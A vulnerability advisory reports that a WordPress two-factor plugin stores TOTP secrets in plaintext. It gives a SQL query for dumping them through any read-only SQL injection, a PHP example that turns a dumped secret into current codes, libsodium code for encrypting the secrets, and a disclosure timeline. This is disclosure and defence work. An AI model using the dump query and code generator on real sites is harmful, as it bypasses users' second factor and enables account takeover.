| Affected plugin | Google Authenticator |
|---|---|
| Vulnerable version | <= 0.54 |
| Fully patched version | – |
| Recommended remediation | Removal of the plugin |
The plugin stores users’ TOTP secret keys as plaintext in the database. A TOTP code is a pure function of the secret and the current time, so anyone who has read the secret can generate valid codes for that user until the secret is replaced. An attacker who can exploit any read-only SQL injection on the same site (the WordPress ecosystem produces a seemingly never-ending supply of them) can therefore read every user’s secret in a single query and bypass all 2FA checks for all users indefinitely, without touching the plugin’s own code paths.
Proof of concept
The plugin stores users’ TOTP secrets as plaintext in the “wp_usermeta” table:

```php
// EDITOR: $GA_secret is just a random string.
update_user_option( $user_id, 'googleauthenticator_secret', $GA_secret, true );
```
An attacker can abuse any read-only SQLi to compromise the two-factor check for every user by getting a query equivalent to the following to execute (wp_ is the default table prefix; a site may use a different one). Each returned meta_value is all that is needed to generate valid codes for that user_id:

```sql
SELECT user_id, meta_value, meta_key FROM wp_usermeta WHERE meta_key = 'googleauthenticator_secret'
```
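To make the impact of the dump concrete, here is an added example (not code from the plugin or from this advisory) that turns a dumped meta_value into the user’s current TOTP code. It assumes the stored value is the RFC 4648 base32 secret the user enrolled in their authenticator app and that the plugin follows the usual Google Authenticator parameters (RFC 6238, HMAC-SHA1, 6 digits, 30-second step); the dumped rows below are constructed and use the RFC 6238 test key so the self-check has a known answer.

```php
<?php
// Added example, not the plugin's code. Assumption: meta_value is the base32
// TOTP secret (RFC 6238, HMAC-SHA1, 6 digits, 30-second time step).

/** Decode an RFC 4648 base32 string (padding optional) into raw bytes. */
function base32_decode_rfc4648(string $b32): string {
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567';
    $b32 = rtrim(strtoupper($b32), '=');
    if ($b32 === '') {
        throw new InvalidArgumentException('empty secret');
    }
    $bits = '';
    foreach (str_split($b32) as $c) {
        $v = strpos($alphabet, $c);
        if ($v === false) {
            throw new InvalidArgumentException("invalid base32 character: $c");
        }
        $bits .= str_pad(decbin($v), 5, '0', STR_PAD_LEFT);
    }
    $out = '';
    foreach (str_split($bits, 8) as $byte) {
        if (strlen($byte) === 8) {          // trailing partial group is padding, drop it
            $out .= chr(bindec($byte));
        }
    }
    return $out;
}

/** RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation. */
function hotp(string $key, int $counter, int $digits = 6): string {
    $msg  = pack('J', $counter);                        // 64-bit unsigned big-endian
    $hash = hash_hmac('sha1', $msg, $key, true);        // 20 raw bytes
    $offset = ord($hash[19]) & 0x0F;
    $code = ((ord($hash[$offset]) & 0x7F) << 24)
          | (ord($hash[$offset + 1]) << 16)
          | (ord($hash[$offset + 2]) << 8)
          |  ord($hash[$offset + 3]);
    return str_pad((string) ($code % (10 ** $digits)), $digits, '0', STR_PAD_LEFT);
}

/** RFC 6238 TOTP for a given Unix time (default: now). */
function totp(string $b32secret, ?int $time = null, int $step = 30): string {
    $time = $time ?? time();
    return hotp(base32_decode_rfc4648($b32secret), intdiv($time, $step));
}

// Self-check against the RFC 6238 SHA-1 test vector: key "12345678901234567890"
// (base32 GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ) at T=59 gives 94287082, i.e. 287082 with 6 digits.
if (totp('GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ', 59) !== '287082') {
    throw new RuntimeException('TOTP self-test failed');
}

// Constructed rows standing in for the result set of the SQL query above.
$dumped = [
    ['user_id' => 1, 'meta_value' => 'GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ'],
];
foreach ($dumped as $row) {
    // Nothing beyond the secret and the clock is needed; no further SQLi, no password.
    printf("user %d: current code %s\n", $row['user_id'], totp($row['meta_value']));
}
```

The only per-user input is the meta_value; the attacker never needs write access, the user’s password reset flow, or a second injection, which is why a single read-only SQLi is sufficient and why the exposure lasts until every affected user re-enrolls with a new secret.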
1. Storing TOTP secrets encrypted in the database, with the encryption key kept outside the database (for example as a constant in wp-config.php), so that a read-only SQLi alone no longer yields usable secrets.
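One way to implement that remediation, as an added example rather than the plugin’s own code: seal the secret before the update_user_option() call shown in the proof of concept and open it again after get_user_option(). It assumes ext/sodium (bundled with PHP 7.2 and later) and a hypothetical constant GA_SECRET_KEY in wp-config.php holding 64 hex characters (for example the output of bin2hex(random_bytes(32))); the function and constant names are this example’s own.

```php
<?php
// Added example implementing item 1 above; not the plugin's code.
// Assumptions: ext/sodium is available, and wp-config.php defines the hypothetical
// constant GA_SECRET_KEY (64 hex characters, e.g. bin2hex(random_bytes(32))).
// The key lives in a file, not in the database, so a read-only SQLi alone cannot use
// the ciphertext it can still read from wp_usermeta.

const GA_META_KEY   = 'googleauthenticator_secret';
const GA_FORMAT_TAG = 'v1:';   // marks sealed values so legacy plaintext rows can be told apart

/** Raw 32-byte key from wp-config.php; fails closed rather than falling back to plaintext. */
function ga_key(): string {
    if (!defined('GA_SECRET_KEY')
        || strlen(GA_SECRET_KEY) !== 2 * SODIUM_CRYPTO_AEAD_XCHACHA20POLY1305_IETF_KEYBYTES) {
        throw new RuntimeException('GA_SECRET_KEY must be defined in wp-config.php (64 hex characters)');
    }
    return sodium_hex2bin(GA_SECRET_KEY);
}

/** Seal with XChaCha20-Poly1305. The user_id is authenticated as additional data, so a
 *  ciphertext copied from another user's row (e.g. via a write SQLi) fails to open. */
function ga_seal_secret(int $user_id, string $plain_secret): string {
    $nonce = random_bytes(SODIUM_CRYPTO_AEAD_XCHACHA20POLY1305_IETF_NPUBBYTES);
    $ct = sodium_crypto_aead_xchacha20poly1305_ietf_encrypt($plain_secret, (string) $user_id, $nonce, ga_key());
    return GA_FORMAT_TAG . sodium_bin2base64($nonce . $ct, SODIUM_BASE64_VARIANT_ORIGINAL);
}

/** Open a sealed value; null on malformed input, tampering, wrong user or wrong key. */
function ga_open_secret(int $user_id, string $stored): ?string {
    try {
        $raw = sodium_base642bin(substr($stored, strlen(GA_FORMAT_TAG)), SODIUM_BASE64_VARIANT_ORIGINAL);
    } catch (SodiumException $e) {
        return null;
    }
    $n = SODIUM_CRYPTO_AEAD_XCHACHA20POLY1305_IETF_NPUBBYTES;
    if (strlen($raw) < $n + SODIUM_CRYPTO_AEAD_XCHACHA20POLY1305_IETF_ABYTES) {
        return null;
    }
    $plain = sodium_crypto_aead_xchacha20poly1305_ietf_decrypt(
        substr($raw, $n), (string) $user_id, substr($raw, 0, $n), ga_key());
    return $plain === false ? null : $plain;
}

/** Drop-in replacement for the plugin's update_user_option() call shown above. */
function ga_store_secret(int $user_id, string $plain_secret): void {
    update_user_option($user_id, GA_META_KEY, ga_seal_secret($user_id, $plain_secret), true);
}

/** Read side: opens sealed rows and re-seals a legacy plaintext row (from <= 0.54) on first use. */
function ga_load_secret(int $user_id): ?string {
    $stored = get_user_option(GA_META_KEY, $user_id);
    if (!is_string($stored) || $stored === '') {
        return null;
    }
    if (strncmp($stored, GA_FORMAT_TAG, strlen(GA_FORMAT_TAG)) !== 0) {
        ga_store_secret($user_id, $stored);   // migrate the plaintext row in place
        return $stored;
    }
    return ga_open_secret($user_id, $stored);
}
```

Two caveats for anyone adopting this pattern: the in-place migration only runs when a user next authenticates, so a one-off migration over all rows is still needed to clear plaintext from the table, and secrets that were already exposed before the change remain valid until the users re-enroll, because encrypting at rest does not undo a past leak.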
| Vendor contacted | September 12, 2022 |
|---|---|
| First response | September 12, 2022 |
| Fully patched at | – |
| Publicly disclosed | April 24, 2023 |
- The developer did not consider this a security issue.